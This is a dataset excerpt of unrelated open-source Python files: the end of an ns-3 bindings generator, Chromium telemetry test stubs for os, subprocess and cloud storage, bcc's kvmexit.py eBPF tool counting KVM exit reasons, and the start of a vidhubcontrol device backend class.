[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Mac48Address &', 'ad')])
## address-utils.h (module 'network'): extern void ns3::WriteTo(ns3::Buffer::Iterator & i, ns3::Address const & ad) [free function]
module.add_function('WriteTo',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Address const &', 'ad')])
## address-utils.h (module 'network'): extern void ns3::WriteTo(ns3::Buffer::Iterator & i, ns3::Ipv4Address ad) [free function]
module.add_function('WriteTo',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Ipv4Address', 'ad')])
## address-utils.h (module 'network'): extern void ns3::WriteTo(ns3::Buffer::Iterator & i, ns3::Ipv6Address ad) [free function]
module.add_function('WriteTo',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Ipv6Address', 'ad')])
## address-utils.h (module 'network'): extern void ns3::WriteTo(ns3::Buffer::Iterator & i, ns3::Mac48Address ad) [free function]
module.add_function('WriteTo',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Mac48Address', 'ad')])
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
register_functions_ns3_addressUtils(module.get_submodule('addressUtils'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def register_functions_ns3_addressUtils(module, root_module):
## address-utils.h (module 'network'): extern bool ns3::addressUtils::IsMulticast(ns3::Address const & ad) [free function]
module.add_function('IsMulticast',
'bool',
[param('ns3::Address const &', 'ad')])
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
|
dtaht/ns-3-dev-old
|
src/network/bindings/modulegen__gcc_LP64.py
|
Python
|
gpl-2.0
| 507,731 | 0.015106 |
# Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides stubs for os, sys and subprocess for testing
This test allows one to test code that itself uses os, sys, and subprocess.
"""
import ntpath
import os
import posixpath
import re
import shlex
import sys
class Override(object):
def __init__(self, base_module, module_list):
stubs = {'cloud_storage': CloudStorageModuleStub,
'open': OpenFunctionStub,
'os': OsModuleStub,
'perf_control': PerfControlModuleStub,
'raw_input': RawInputFunctionStub,
'subprocess': SubprocessModuleStub,
'sys': SysModuleStub,
'thermal_throttle': ThermalThrottleModuleStub,
'logging': LoggingStub,
'certutils': CertUtilsStub,
'adb_install_cert': AdbInstallCertStub,
'platformsettings': PlatformSettingsStub,
}
self.adb_commands = None
self.os = None
self.subprocess = None
self.sys = None
self._base_module = base_module
self._overrides = {}
for module_name in module_list:
self._overrides[module_name] = getattr(base_module, module_name, None)
setattr(self, module_name, stubs[module_name]())
setattr(base_module, module_name, getattr(self, module_name))
if self.os and self.sys:
self.os.path.sys = self.sys
def __del__(self):
assert not len(self._overrides)
def Restore(self):
for module_name, original_module in self._overrides.iteritems():
if original_module is None:
# This will happen when we override built-in functions, like open.
# If we don't delete the attribute, we will shadow the built-in
# function with an attribute set to None.
delattr(self._base_module, module_name)
else:
setattr(self._base_module, module_name, original_module)
self._overrides = {}
class AdbDevice(object):
def __init__(self):
self.has_root = False
self.needs_su = False
self.shell_command_handlers = {}
self.mock_content = []
self.system_properties = {}
if self.system_properties.get('ro.product.cpu.abi') == None:
self.system_properties['ro.product.cpu.abi'] = 'armeabi-v7a'
def HasRoot(self):
return self.has_root
def NeedsSU(self):
return self.needs_su
def RunShellCommand(self, args, **_kwargs):
if isinstance(args, basestring):
args = shlex.split(args)
handler = self.shell_command_handlers[args[0]]
return handler(args)
def FileExists(self, _):
return False
def ReadFile(self, device_path, as_root=False): # pylint: disable=W0613
return self.mock_content
def GetProp(self, property_name):
return self.system_properties[property_name]
def SetProp(self, property_name, property_value):
self.system_properties[property_name] = property_value
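# Typical wiring in a test (illustrative; the shell handler and property used
# below are made-up examples, not part of any real adb interface):
#
#   device = AdbDevice()
#   device.has_root = True
#   device.shell_command_handlers['getprop'] = lambda args: ['[ro.secure]: [0]']
#   device.RunShellCommand('getprop ro.secure')  # dispatches on args[0]
#   device.SetProp('ro.build.id', 'ABC123')
#   device.GetProp('ro.build.id')  # -> 'ABC123'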
class CloudStorageModuleStub(object):
PUBLIC_BUCKET = 'chromium-telemetry'
PARTNER_BUCKET = 'chrome-partner-telemetry'
INTERNAL_BUCKET = 'chrome-telemetry'
BUCKET_ALIASES = {
'public': PUBLIC_BUCKET,
'partner': PARTNER_BUCKET,
'internal': INTERNAL_BUCKET,
}
# These are used to test for CloudStorage errors.
INTERNAL_PERMISSION = 2
PARTNER_PERMISSION = 1
PUBLIC_PERMISSION = 0
# Not logged in.
CREDENTIALS_ERROR_PERMISSION = -1
class NotFoundError(Exception):
pass
class CloudStorageError(Exception):
pass
class PermissionError(CloudStorageError):
pass
class CredentialsError(CloudStorageError):
pass
def __init__(self):
self.default_remote_paths = {CloudStorageModuleStub.INTERNAL_BUCKET:{},
CloudStorageModuleStub.PARTNER_BUCKET:{},
CloudStorageModuleStub.PUBLIC_BUCKET:{}}
self.remote_paths = self.default_remote_paths
self.local_file_hashes = {}
self.local_hash_files = {}
self.permission_level = CloudStorageModuleStub.INTERNAL_PERMISSION
self.downloaded_files = []
def SetPermissionLevelForTesting(self, permission_level):
self.permission_level = permission_level
def CheckPermissionLevelForBucket(self, bucket):
if bucket == CloudStorageModuleStub.PUBLIC_BUCKET:
return
elif (self.permission_level ==
CloudStorageModuleStub.CREDENTIALS_ERROR_PERMISSION):
raise CloudStorageModuleStub.CredentialsError()
elif bucket == CloudStorageModuleStub.PARTNER_BUCKET:
if self.permission_level < CloudStorageModuleStub.PARTNER_PERMISSION:
raise CloudStorageModuleStub.PermissionError()
elif bucket == CloudStorageModuleStub.INTERNAL_BUCKET:
if self.permission_level < CloudStorageModuleStub.INTERNAL_PERMISSION:
raise CloudStorageModuleStub.PermissionError()
elif bucket not in self.remote_paths:
raise CloudStorageModuleStub.NotFoundError()
def SetRemotePathsForTesting(self, remote_path_dict=None):
if not remote_path_dict:
self.remote_paths = self.default_remote_paths
return
self.remote_paths = remote_path_dict
def GetRemotePathsForTesting(self):
if not self.remote_paths:
self.remote_paths = self.default_remote_paths
return self.remote_paths
# Set a dictionary of data files and their "calculated" hashes.
def SetCalculatedHashesForTesting(self, calculated_hash_dictionary):
self.local_file_hashes = calculated_hash_dictionary
def GetLocalDataFiles(self):
return self.local_file_hashes.keys()
# Set a dictionary of hash files and the hashes they should contain.
def SetHashFileContentsForTesting(self, hash_file_dictionary):
self.local_hash_files = hash_file_dictionary
def GetLocalHashFiles(self):
return self.local_hash_files.keys()
def ChangeRemoteHashForTesting(self, bucket, remote_path, new_hash):
self.remote_paths[bucket][remote_path] = new_hash
def List(self, bucket):
if not bucket or not bucket in self.remote_paths:
bucket_error = ('Incorrect bucket specified, correct buckets:' +
str(self.remote_paths))
raise CloudStorageModuleStub.CloudStorageError(bucket_error)
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
return list(self.remote_paths[bucket].keys())
def Exists(self, bucket, remote_path):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
return remote_path in self.remote_paths[bucket]
def Insert(self, bucket, remote_path, local_path):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
if not local_path in self.GetLocalDataFiles():
file_path_error = 'Local file path does not exist'
raise CloudStorageModuleStub.CloudStorageError(file_path_error)
self.remote_paths[bucket][remote_path] = (
CloudStorageModuleStub.CalculateHash(self, local_path))
return remote_path
def GetHelper(self, bucket, remote_path, local_path, only_if_changed):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
if not remote_path in self.remote_paths[bucket]:
if only_if_changed:
return False
raise CloudStorageModuleStub.NotFoundError('Remote file does not exist.')
remote_hash = self.remote_paths[bucket][remote_path]
local_hash = self.local_file_hashes[local_path]
if only_if_changed and remote_hash == local_hash:
return False
self.downloaded_files.append(remote_path)
self.local_file_hashes[local_path] = remote_hash
self.local_hash_files[local_path + '.sha1'] = remote_hash
return remote_hash
def Get(self, bucket, remote_path, local_path):
return CloudStorageModuleStub.GetHelper(self, bucket, remote_path,
local_path, False)
def GetIfChanged(self, local_path, bucket=None):
remote_path = os.path.basename(local_path)
if bucket:
return CloudStorageModuleStub.GetHelper(self, bucket, remote_path,
local_path, True)
result = CloudStorageModuleStub.GetHelper(
self, self.PUBLIC_BUCKET, remote_path, local_path, True)
if not result:
result = CloudStorageModuleStub.GetHelper(
self, self.PARTNER_BUCKET, remote_path, local_path, True)
if not result:
result = CloudStorageModuleStub.GetHelper(
self, self.INTERNAL_BUCKET, remote_path, local_path, True)
return result
def GetFilesInDirectoryIfChanged(self, directory, bucket):
if os.path.dirname(directory) == directory: # If in the root dir.
raise ValueError('Trying to serve root directory from HTTP server.')
for dirpath, _, filenames in os.walk(directory):
for filename in filenames:
path, extension = os.path.splitext(
os.path.join(dirpath, filename))
if extension != '.sha1':
continue
self.GetIfChanged(path, bucket)
def CalculateHash(self, file_path):
return self.local_file_hashes[file_path]
def ReadHash(self, hash_path):
return self.local_hash_files[hash_path]
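# Illustrative test flow for this stub (a sketch; the bucket contents, paths
# and hashes below are made up):
#
#   cs = CloudStorageModuleStub()
#   cs.SetRemotePathsForTesting(
#       {CloudStorageModuleStub.PUBLIC_BUCKET: {'page_set.wpr': 'remote_hash'}})
#   cs.SetCalculatedHashesForTesting({'/tmp/page_set.wpr': 'local_hash'})
#   cs.SetHashFileContentsForTesting({'/tmp/page_set.wpr.sha1': 'local_hash'})
#   # The remote and local hashes differ, so this "downloads" the file.
#   cs.GetIfChanged('/tmp/page_set.wpr', CloudStorageModuleStub.PUBLIC_BUCKET)
#   cs.downloaded_files  # -> ['page_set.wpr']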
class LoggingStub(object):
def __init__(self):
self.warnings = []
self.errors = []
def info(self, msg, *args):
pass
def error(self, msg, *args):
self.errors.append(msg % args)
def warning(self, msg, *args):
self.warnings.append(msg % args)
def warn(self, msg, *args):
self.warning(msg, *args)
class OpenFunctionStub(object):
class FileStub(object):
def __init__(self, data):
self._data = data
def __enter__(self):
return self
def __exit__(self, *args):
pass
def read(self, size=None):
if size:
return self._data[:size]
else:
return self._data
def write(self, data):
self._data.write(data)
def close(self):
pass
def __init__(self):
self.files = {}
def __call__(self, name, *args, **kwargs):
return OpenFunctionStub.FileStub(self.files[name])
class OsModuleStub(object):
class OsEnvironModuleStub(object):
def get(self, _):
return None
class OsPathModuleStub(object):
def __init__(self, sys_module):
self.sys = sys_module
self.files = []
self.dirs = []
def exists(self, path):
return path in self.files
def isfile(self, path):
return path in self.files
def isdir(self, path):
return path in self.dirs
def join(self, *paths):
def IsAbsolutePath(path):
if self.sys.platform.startswith('win'):
return re.match('[a-zA-Z]:\\\\', path)
else:
return path.startswith('/')
# Per Python specification, if any component is an absolute path,
# discard previous components.
for index, path in reversed(list(enumerate(paths))):
if IsAbsolutePath(path):
paths = paths[index:]
break
if self.sys.platform.startswith('win'):
tmp = os.path.join(*paths)
return tmp.replace('/', '\\')
else:
tmp = os.path.join(*paths)
return tmp.replace('\\', '/')
def basename(self, path):
if self.sys.platform.startswith('win'):
return ntpath.basename(path)
else:
return posixpath.basename(path)
@staticmethod
def abspath(path):
return os.path.abspath(path)
@staticmethod
def expanduser(path):
return os.path.expanduser(path)
@staticmethod
def dirname(path):
return os.path.dirname(path)
@staticmethod
def realpath(path):
return os.path.realpath(path)
@staticmethod
def split(path):
return os.path.split(path)
@staticmethod
def splitext(path):
return os.path.splitext(path)
@staticmethod
def splitdrive(path):
return os.path.splitdrive(path)
X_OK = os.X_OK
sep = os.sep
pathsep = os.pathsep
def __init__(self, sys_module=sys):
self.path = OsModuleStub.OsPathModuleStub(sys_module)
self.environ = OsModuleStub.OsEnvironModuleStub()
self.display = ':0'
self.local_app_data = None
self.sys_path = None
self.program_files = None
self.program_files_x86 = None
self.devnull = os.devnull
self._directory = {}
def access(self, path, _):
return path in self.path.files
def getenv(self, name, value=None):
if name == 'DISPLAY':
env = self.display
elif name == 'LOCALAPPDATA':
env = self.local_app_data
elif name == 'PATH':
env = self.sys_path
elif name == 'PROGRAMFILES':
env = self.program_files
elif name == 'PROGRAMFILES(X86)':
env = self.program_files_x86
else:
raise NotImplementedError('Unsupported getenv')
return env if env else value
def chdir(self, path):
pass
def walk(self, top):
for dir_name in self._directory:
yield top, dir_name, self._directory[dir_name]
class PerfControlModuleStub(object):
class PerfControlStub(object):
def __init__(self, adb):
pass
def __init__(self):
self.PerfControl = PerfControlModuleStub.PerfControlStub
class RawInputFunctionStub(object):
def __init__(self):
self.input = ''
def __call__(self, name, *args, **kwargs):
return self.input
class SubprocessModuleStub(object):
class PopenStub(object):
def __init__(self):
self.communicate_result = ('', '')
self.returncode_result = 0
def __call__(self, args, **kwargs):
return self
def communicate(self):
return self.communicate_result
@property
def returncode(self):
return self.returncode_result
def __init__(self):
self.Popen = SubprocessModuleStub.PopenStub()
self.PIPE = None
def call(self, *args, **kwargs):
pass
class SysModuleStub(object):
def __init__(self):
self.platform = ''
class ThermalThrottleModuleStub(object):
class ThermalThrottleStub(object):
def __init__(self, adb):
pass
def __init__(self):
self.ThermalThrottle = ThermalThrottleModuleStub.ThermalThrottleStub
class CertUtilsStub(object):
openssl_import_error = None
@staticmethod
def write_dummy_ca_cert(_ca_cert_str, _key_str, cert_path):
pass
@staticmethod
def generate_dummy_ca_cert():
return '-', '-'
class AdbInstallCertStub(object):
class AndroidCertInstaller(object):
def __init__(self, device_id, _cert_name, _cert_path):
if device_id == 'success':
pass
elif device_id == 'failure':
raise Exception('Test exception.')
def install_cert(self, overwrite_cert=False):
pass
class PlatformSettingsStub(object):
@staticmethod
def HasSniSupport():
return True
|
Bysmyyr/chromium-crosswalk
|
tools/telemetry/telemetry/testing/system_stub.py
|
Python
|
bsd-3-clause
| 14,620 | 0.011833 |
#!/usr/bin/env python
#
# kvmexit.py
#
# Display the exit_reason and its statistics of each vm exit
# for all vcpus of all virtual machines. For example:
# $./kvmexit.py
# PID TID KVM_EXIT_REASON COUNT
# 1273551 1273568 EXIT_REASON_MSR_WRITE 6
# 1274253 1274261 EXIT_REASON_EXTERNAL_INTERRUPT 1
# 1274253 1274261 EXIT_REASON_HLT 12
# ...
#
# In addition, users may restrict the output to one pid, a set of tids, or
# one pid plus a single vcpu. See kvmexit_example.txt for more examples.
#
# @PID: each virtual machine's pid in the user space.
# @TID: the user-space thread backing each vcpu of that virtual machine.
# @KVM_EXIT_REASON: the reason why the vm exits.
# @COUNT: how many times each @KVM_EXIT_REASON occurred.
#
# REQUIRES: Linux 4.7+ (BPF_PROG_TYPE_TRACEPOINT support)
#
# Copyright (c) 2021 ByteDance Inc. All rights reserved.
#
# Author(s):
# Fei Li <[email protected]>
from __future__ import print_function
from time import sleep
from bcc import BPF
import argparse
import multiprocessing
import os
import subprocess
#
# Process Arguments
#
def valid_args_list(args):
args_list = args.split(",")
for arg in args_list:
try:
int(arg)
except:
raise argparse.ArgumentTypeError("must be valid integer")
return args_list
# arguments
examples = """examples:
./kvmexit # Display kvm_exit_reason and its statistics in real-time until Ctrl-C
./kvmexit 5 # Display in real-time after sleeping 5s
    ./kvmexit -p 3195281                   # Collapse all tids for pid 3195281 with exit reasons sorted in descending order
    ./kvmexit -p 3195281 20                # Collapse all tids for pid 3195281 with exit reasons sorted in descending order, and display after sleeping 20s
./kvmexit -p 3195281 -v 0 # Display only vcpu0 for pid 3195281, descending sort by default
./kvmexit -p 3195281 -a # Display all tids for pid 3195281
./kvmexit -t 395490 # Display only for tid 395490 with exit reasons sorted in descending order
./kvmexit -t 395490 20 # Display only for tid 395490 with exit reasons sorted in descending order after sleeping 20s
./kvmexit -T '395490,395491' # Display for a union like {395490, 395491}
"""
parser = argparse.ArgumentParser(
description="Display kvm_exit_reason and its statistics at a timed interval",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("duration", nargs="?", default=99999999, type=int, help="show delta for next several seconds")
parser.add_argument("-p", "--pid", type=int, help="trace this PID only")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("-t", "--tid", type=int, help="trace this TID only")
exgroup.add_argument("-T", "--tids", type=valid_args_list, help="trace a comma separated series of tids with no space in between")
exgroup.add_argument("-v", "--vcpu", type=int, help="trace this vcpu only")
exgroup.add_argument("-a", "--alltids", action="store_true", help="trace all tids for this pid")
args = parser.parse_args()
duration = int(args.duration)
#
# Setup BPF
#
# load BPF program
bpf_text = """
#include <linux/delay.h>
#define REASON_NUM 69
#define TGID_NUM 1024
struct exit_count {
u64 exit_ct[REASON_NUM];
};
BPF_PERCPU_ARRAY(init_value, struct exit_count, 1);
BPF_TABLE("percpu_hash", u64, struct exit_count, pcpu_kvm_stat, TGID_NUM);
struct cache_info {
u64 cache_pid_tgid;
struct exit_count cache_exit_ct;
};
BPF_PERCPU_ARRAY(pcpu_cache, struct cache_info, 1);
FUNC_ENTRY {
int cache_miss = 0;
int zero = 0;
u32 er = GET_ER;
if (er >= REASON_NUM) {
return 0;
}
u64 cur_pid_tgid = bpf_get_current_pid_tgid();
u32 tgid = cur_pid_tgid >> 32;
u32 pid = cur_pid_tgid;
if (THREAD_FILTER)
return 0;
struct exit_count *tmp_info = NULL, *initial = NULL;
struct cache_info *cache_p;
cache_p = pcpu_cache.lookup(&zero);
if (cache_p == NULL) {
return 0;
}
if (cache_p->cache_pid_tgid == cur_pid_tgid) {
//a. If the cur_pid_tgid hit this physical cpu consecutively, save it to pcpu_cache
tmp_info = &cache_p->cache_exit_ct;
} else {
//b. If another pid_tgid matches this pcpu for the last hit, OR it is the first time to hit this physical cpu.
cache_miss = 1;
// b.a Try to load the last cache struct if exists.
tmp_info = pcpu_kvm_stat.lookup(&cur_pid_tgid);
        // b.b If it is the first time for the cur_pid_tgid to hit this pcpu, employ a
        // per_cpu array to initialize pcpu_kvm_stat's exit_count with each exit reason's count set to zero
if (tmp_info == NULL) {
initial = init_value.lookup(&zero);
if (initial == NULL) {
return 0;
}
pcpu_kvm_stat.update(&cur_pid_tgid, initial);
tmp_info = pcpu_kvm_stat.lookup(&cur_pid_tgid);
// To pass the verifier
if (tmp_info == NULL) {
return 0;
}
}
}
if (er < REASON_NUM) {
tmp_info->exit_ct[er]++;
if (cache_miss == 1) {
if (cache_p->cache_pid_tgid != 0) {
// b.*.a Let's save the last hit cache_info into kvm_stat.
pcpu_kvm_stat.update(&cache_p->cache_pid_tgid, &cache_p->cache_exit_ct);
}
// b.* As the cur_pid_tgid meets current pcpu_cache_array for the first time, save it.
cache_p->cache_pid_tgid = cur_pid_tgid;
bpf_probe_read(&cache_p->cache_exit_ct, sizeof(*tmp_info), tmp_info);
}
return 0;
}
return 0;
}
"""
# format output
exit_reasons = (
"EXCEPTION_NMI",
"EXTERNAL_INTERRUPT",
"TRIPLE_FAULT",
"INIT_SIGNAL",
"N/A",
"N/A",
"N/A",
"INTERRUPT_WINDOW",
"NMI_WINDOW",
"TASK_SWITCH",
"CPUID",
"N/A",
"HLT",
"INVD",
"INVLPG",
"RDPMC",
"RDTSC",
"N/A",
"VMCALL",
"VMCLEAR",
"VMLAUNCH",
"VMPTRLD",
"VMPTRST",
"VMREAD",
"VMRESUME",
"VMWRITE",
"VMOFF",
"VMON",
"CR_ACCESS",
"DR_ACCESS",
"IO_INSTRUCTION",
"MSR_READ",
"MSR_WRITE",
"INVALID_STATE",
"MSR_LOAD_FAIL",
"N/A",
"MWAIT_INSTRUCTION",
"MONITOR_TRAP_FLAG",
"N/A",
"MONITOR_INSTRUCTION",
"PAUSE_INSTRUCTION",
"MCE_DURING_VMENTRY",
"N/A",
"TPR_BELOW_THRESHOLD",
"APIC_ACCESS",
"EOI_INDUCED",
"GDTR_IDTR",
"LDTR_TR",
"EPT_VIOLATION",
"EPT_MISCONFIG",
"INVEPT",
"RDTSCP",
"PREEMPTION_TIMER",
"INVVPID",
"WBINVD",
"XSETBV",
"APIC_WRITE",
"RDRAND",
"INVPCID",
"VMFUNC",
"ENCLS",
"RDSEED",
"PML_FULL",
"XSAVES",
"XRSTORS",
"N/A",
"N/A",
"UMWAIT",
"TPAUSE"
)
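# Index i in this tuple corresponds to Intel VMX basic exit reason number i;
# it is expected to stay in sync with REASON_NUM in the BPF program above.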
#
# Do some checks
#
try:
    # Currently, only adapted to the Intel architecture
cmd = "cat /proc/cpuinfo | grep vendor_id | head -n 1"
arch_info = subprocess.check_output(cmd, shell=True).strip()
if b"Intel" in arch_info:
pass
else:
raise Exception("Currently we only support Intel architecture, please do expansion if needs more.")
# Check if kvm module is loaded
if os.access("/dev/kvm", os.R_OK | os.W_OK):
pass
else:
raise Exception("Please insmod kvm module to use kvmexit tool.")
except Exception as e:
raise Exception("Failed to do precondition check, due to: %s." % e)
try:
if BPF.support_raw_tracepoint_in_module():
# Let's firstly try raw_tracepoint_in_module
func_entry = "RAW_TRACEPOINT_PROBE(kvm_exit)"
get_er = "ctx->args[0]"
else:
# If raw_tp_in_module is not supported, fall back to regular tp
func_entry = "TRACEPOINT_PROBE(kvm, kvm_exit)"
get_er = "args->exit_reason"
except Exception as e:
raise Exception("Failed to catch kvm exit reasons due to: %s" % e)
def find_tid(tgt_dir, tgt_vcpu):
    for tid in os.listdir(tgt_dir):
        path = tgt_dir + "/" + tid + "/comm"
        with open(path, "r") as fp:
            comm = fp.read()
        if comm.find(tgt_vcpu) != -1:
            return tid
    return -1
# set process/thread filter
thread_context = ""
header_format = ""
need_collapse = not args.alltids
if args.tid is not None:
thread_context = "TID %s" % args.tid
thread_filter = 'pid != %s' % args.tid
elif args.tids is not None:
thread_context = "TIDS %s" % args.tids
thread_filter = "pid != " + " && pid != ".join(args.tids)
header_format = "TIDS "
elif args.pid is not None:
thread_context = "PID %s" % args.pid
thread_filter = 'tgid != %s' % args.pid
if args.vcpu is not None:
thread_context = "PID %s VCPU %s" % (args.pid, args.vcpu)
# transfer vcpu to tid
tgt_dir = '/proc/' + str(args.pid) + '/task'
tgt_vcpu = "CPU " + str(args.vcpu)
args.tid = find_tid(tgt_dir, tgt_vcpu)
if args.tid == -1:
raise Exception("There's no v%s for PID %d." % (tgt_vcpu, args.pid))
thread_filter = 'pid != %s' % args.tid
elif args.alltids:
thread_context = "PID %s and its all threads" % args.pid
header_format = "TID "
else:
thread_context = "all threads"
thread_filter = '0'
header_format = "PID TID "
bpf_text = bpf_text.replace('THREAD_FILTER', thread_filter)
# For kernel >= 5.0, use RAW_TRACEPOINT_MODULE for better performance
bpf_text = bpf_text.replace('FUNC_ENTRY', func_entry)
bpf_text = bpf_text.replace('GET_ER', get_er)
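# Illustration (comment only): after these substitutions the probe begins with either
# "RAW_TRACEPOINT_PROBE(kvm_exit)" and reads the exit reason from ctx->args[0], or
# "TRACEPOINT_PROBE(kvm, kvm_exit)" and reads it from args->exit_reason.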
b = BPF(text=bpf_text)
# header
print("Display kvm exit reasons and statistics for %s" % thread_context, end="")
if duration < 99999999:
print(" after sleeping %d secs." % duration)
else:
print("... Hit Ctrl-C to end.")
try:
sleep(duration)
except KeyboardInterrupt:
print()
# Currently, sorting multiple tids in descending order is not supported.
if (args.pid or args.tid):
ct_reason = []
if args.pid:
tgid_exit = [0 for i in range(len(exit_reasons))]
# output
print("%s%-35s %s" % (header_format, "KVM_EXIT_REASON", "COUNT"))
pcpu_kvm_stat = b["pcpu_kvm_stat"]
pcpu_cache = b["pcpu_cache"]
for k, v in pcpu_kvm_stat.items():
tgid = k.value >> 32
pid = k.value & 0xffffffff
for i in range(0, len(exit_reasons)):
sum1 = 0
for inner_cpu in range(0, multiprocessing.cpu_count()):
cachePIDTGID = pcpu_cache[0][inner_cpu].cache_pid_tgid
            # Check the per-cpu cache first
if cachePIDTGID == k.value:
sum1 += pcpu_cache[0][inner_cpu].cache_exit_ct.exit_ct[i]
# If not in cache, find from kvm_stat
else:
sum1 += v[inner_cpu].exit_ct[i]
if sum1 == 0:
continue
if (args.pid and args.pid == tgid and need_collapse):
tgid_exit[i] += sum1
elif (args.tid and args.tid == pid):
ct_reason.append((sum1, i))
elif not need_collapse or args.tids:
print("%-8u %-35s %-8u" % (pid, exit_reasons[i], sum1))
else:
print("%-8u %-8u %-35s %-8u" % (tgid, pid, exit_reasons[i], sum1))
# Display only for the target tid in descending sort
if (args.tid and args.tid == pid):
ct_reason.sort(reverse=True)
for i in range(0, len(ct_reason)):
if ct_reason[i][0] == 0:
continue
print("%-35s %-8u" % (exit_reasons[ct_reason[i][1]], ct_reason[i][0]))
break
# Aggregate all tids' counts for this args.pid in descending sort
if args.pid and need_collapse:
for i in range(0, len(exit_reasons)):
ct_reason.append((tgid_exit[i], i))
ct_reason.sort(reverse=True)
for i in range(0, len(ct_reason)):
if ct_reason[i][0] == 0:
continue
print("%-35s %-8u" % (exit_reasons[ct_reason[i][1]], ct_reason[i][0]))
|
brendangregg/bcc
|
tools/kvmexit.py
|
Python
|
apache-2.0
| 12,070 | 0.002237 |
from loguru import logger
import asyncio
from typing import Optional, List, Dict, ClassVar
from pydispatch import Dispatcher, Property
from pydispatch.properties import ListProperty, DictProperty
from vidhubcontrol.common import ConnectionState, ConnectionManager
class BackendBase(Dispatcher):
"""Base class for communicating with devices
:Events:
.. function:: on_preset_added(backend: BackendBase = self, preset: Preset = preset)
This :class:`~pydispatch.dispatch.Event` is emitted
when a new :class:`Preset` has been added.
.. function:: on_preset_stored(backend: BackendBase = self, preset: Preset = preset)
This :class:`~pydispatch.dispatch.Event` is emitted
when an existing :class:`Preset` has been recorded (updated).
.. function:: on_preset_active(backend: BackendBase, preset: Preset = preset, value: bool = value)
This :class:`~pydispatch.dispatch.Event` is emitted
when an existing :class:`Preset` has determined that its stored
routing information is currently active on the switcher.
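    A minimal usage sketch (illustrative only; ``MyBackend`` stands in for a
    concrete :class:`VidhubBackendBase` subclass implementing :meth:`do_connect`
    and :meth:`do_disconnect`, run from inside a coroutine)::
        def handle_preset_added(*args, **kwargs):
            print('added preset:', kwargs['preset'].name)
        backend = await MyBackend.create_async(device_name='demo')
        backend.bind(on_preset_added=handle_preset_added)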
"""
device_name: str = Property()
device_model: str = Property()
"""The model name as reported by the device"""
device_id: str = Property()
"""The unique id as reported by the device"""
device_version: str = Property()
"""Firmware version reported by the device"""
connection_manager: ConnectionManager
"""Manager for the device's :class:`~.common.ConnectionState`"""
prelude_parsed: bool = Property(False)
def __init__(self, **kwargs):
self.connection_manager = ConnectionManager()
self.device_name = kwargs.get('device_name')
self.client = None
self.event_loop = kwargs.get('event_loop', asyncio.get_event_loop())
self.bind(device_id=self.on_device_id)
if self.device_id is None:
self.device_id = kwargs.get('device_id')
@property
def connection_state(self) -> ConnectionState:
"""The current :attr:`~.common.ConnectionManager.state` of the
:attr:`connection_manager`
"""
return self.connection_manager.state
@classmethod
async def create_async(cls, **kwargs):
obj = cls(**kwargs)
await obj.connect()
return obj
async def connect(self):
manager = self.connection_manager
async with manager:
if manager.state & ConnectionState.waiting != 0:
state = await manager.wait_for('connected|not_connected')
if manager.state.is_connected:
return self.client
assert ConnectionState.not_connected in manager.state
await manager.set_state('connecting')
await asyncio.sleep(0)
try:
r = await asyncio.wait_for(self.do_connect(), timeout=2)
except asyncio.TimeoutError as exc:
r = False
async with manager:
if r is False and ConnectionState.failure not in manager.state:
await manager.set_failure('unknown')
if ConnectionState.failure in manager.state:
await manager.set_state('not_connected')
else:
if self.client is not None:
self.client = r
await manager.set_state('connected')
return r
async def disconnect(self):
manager = self.connection_manager
async with manager:
if ConnectionState.not_connected in manager.state:
return
elif ConnectionState.disconnecting in manager.state:
await manager.wait_for('not_connected')
return
elif ConnectionState.connecting in manager.state:
state = await manager.wait_for('connected|not_connected')
if state == ConnectionState.not_connected:
return
assert manager.state.is_connected
await manager.set_state('disconnecting')
await asyncio.sleep(0)
await self.do_disconnect()
async with manager:
self.client = None
await manager.set_state('not_connected')
async def _catch_exception(self, e: Exception, is_error: Optional[bool] = False):
if not is_error:
logger.exception(e)
return
exc_type = e.__class__
try:
exc_info = e.args
except:
exc_info = str(e)
async with self.connection_manager as manager:
await manager.set_failure(exc_info, e)
try:
await self.do_disconnect()
finally:
self.client = None
async with self.connection_manager as manager:
await manager.set_state('not_connected')
async def do_connect(self):
raise NotImplementedError()
async def do_disconnect(self):
raise NotImplementedError()
async def get_status(self):
raise NotImplementedError()
def on_device_id(self, instance, value, **kwargs):
if value is None:
return
if self.device_name is None:
self.device_name = value
self.unbind(self.on_device_id)
class VidhubBackendBase(BackendBase):
"""Base class for Videohub devices
Attributes:
num_outputs (int): The number of outputs as reported by the switcher.
num_inputs (int): The number of inputs as reported by the switcher.
crosspoints: This represents the currently active routing of the
switcher. Each element in the ``list`` represents an output (the
zero-based index of the ``list``) with its selected index as the
value (also zero-based).
This is a :class:`pydispatch.properties.ListProperty` and can be
observed using the :meth:`~pydispatch.Dispatcher.bind` method.
output_labels: A ``list`` containing the names of each output
as reported by the switcher
This is a :class:`pydispatch.properties.ListProperty` and can be
observed using the :meth:`~pydispatch.Dispatcher.bind` method.
input_labels: A ``list`` containing the names of each input
as reported by the switcher
This is a :class:`pydispatch.properties.ListProperty` and can be
observed using the :meth:`~pydispatch.Dispatcher.bind` method.
crosspoint_control: This is similar to :attr:`~VidhubBackendBase.crosspoints`
but if modified from outside code, the crosspoint changes will be
set on the device (no method calls required).
:class:`pydispatch.properties.ListProperty`
output_label_control: This is similar to :attr:`~VidhubBackendBase.output_labels`
but if modified from outside code, the label changes will be written
to the device (no method calls required).
:class:`pydispatch.properties.ListProperty`
input_label_control: This is similar to :attr:`~VidhubBackendBase.input_labels`
but if modified from outside code, the label changes will be written
to the device (no method calls required).
:class:`pydispatch.properties.ListProperty`
